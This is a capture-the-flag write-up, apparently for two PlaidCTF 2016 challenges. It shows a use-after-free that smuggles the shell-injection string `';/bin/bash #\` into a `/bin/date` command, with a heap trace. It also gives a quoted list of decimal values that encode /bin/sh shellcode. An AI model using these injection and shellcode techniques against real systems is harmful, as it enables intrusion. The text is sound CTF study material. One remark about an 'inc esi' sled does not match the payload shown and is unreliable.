- First, we have to know that the binary checks a debug bit and behaves differently depending on that flag, so it can be run in more than one environment.
- Also, when we try to quit the program with option 5, free() is called on the stored strings first and only then are we asked whether we really want to quit. If we answer no, the program keeps running with the freed pointers, which gives us the DFB (Double Free Bug) we use to get the flag (in practice it is a use-after-free through the dangling format pointer, as the log below shows).
- Finally, when the program converts the number to a Unix time string, it runs `/bin/date -d @time +'format'` through a shell, where both time and format are user input.
- If we could input `';/bin/bash #\` as the format we would get a shell. However, the format input only accepts the characters `%aAbBcCdDeFgGhHIjklmNnNpPrRsStTuUVwWxXyYzZ:-_/0^#`, so we can't input it directly. We have to use the DFB here.
- Here is the session (the `strdup`/`free` lines are traced library calls; the lone digits are our menu choices):

    Format: %c
    strdup(0x7fffaec863f8) = 0x251d420
    3
    Time zone: hello
    strdup(0x7fffaec863f8) = 0x251d440
    5
    free(0x251d420)
    free(0x251d440)
    Are you sure you want to exit (y/N)? n
    3
    Time zone: hello
    strdup(0x7fffaec863f8) = 0x251d440
    3
    Time zone: hello
    strdup(0x7fffaec863f8) = 0x251d420
    Time zone set.
    4
    Your formatted time is:
    Running command: /bin/date -d @0 +'hello'
    hello
- With that method we changed the format from `%c` to `hello` without using option 1: the two strings were freed in order (0x251d420, then 0x251d440), the next two strdup calls handed the chunks back in reverse order, and the second time zone landed in the chunk the format pointer still referenced.
- The same way, we can put `';/bin/bash #\` into the format, because the time zone input doesn't check any characters.
- The attack script is [here](https://github.com/parksjin01/ctf/blob/master/2016/Plaid/Unix_Time_Format.py).
- Hmm... I think it's too difficult; I can't understand the answer.
- I'll just upload the attack file that other people made.
- It's [here](https://github.com/parksjin01/ctf/blob/master/2016/Plaid/butterfly.py).
- The binary is tiny and easy to reverse. However, I think it's hard to get shellcode into the buffer.
- When we input a decimal number, the program divides it by 1337.0 and stores the resulting floating-point values in the buffer one after another.
- If I can make those values equal to shellcode I can easily pwn it, because there is also a call instruction in main.
- All we have to do is put shellcode into the buffer, but I think that's really hard, so I googled it.
- This good hacker ([PCTF2016-fixedpoint](https://duksctf.github.io/PCTF2016-fixedpoint/)) says this is the proper payload for this problem:
payload = [
'17018517', # mov ebx, esp ~> 89e3
'16493296', # xor eax, eax; inc eax ~> 31c040
'16963939', # inc eax; inc eax ~> 4040
'16963939', # inc eax; inc eax ~> 4040
'16963939', # inc eax; inc eax ~> 4040
'16963939', # inc eax; inc eax ~> 4040
'16963939', # inc eax; inc eax ~> 4040
'17009712', # xor ecx, ecx ~> 31c9
'17012720', # xor edx, edx ~> 31d2
'14975661', # /
'16965949', # inc ebx
'19339629', # b
'16965949', # inc ebx
'19938605', # i
'16965949', # inc ebx
'20366445', # n
'16965949', # inc ebx
'14975661', # /
'16965949', # inc ebx
'20794285', # s
'16965949', # inc ebx
'19853037', # h
'16965949', # inc ebx
'10953965', # \0
'16965949', # inc ebx
'16967631', # dec ebx; dec ebx;
'16967631', # dec ebx; dec ebx;
'16967631', # dec ebx; dec ebx;
'16967631', # dec ebx; dec ebx;
'17071084', # int 0x80
]
- He used `inc esi` as a NOP sled instead of `nop`, and I think it's brilliant.
- Although I didn't solve the problem, I found a useful tool to convert floating point to binary: [IEEE 754 Floating Point Converter](https://www.h-schmidt.net/FloatConverter/IEEE754.html)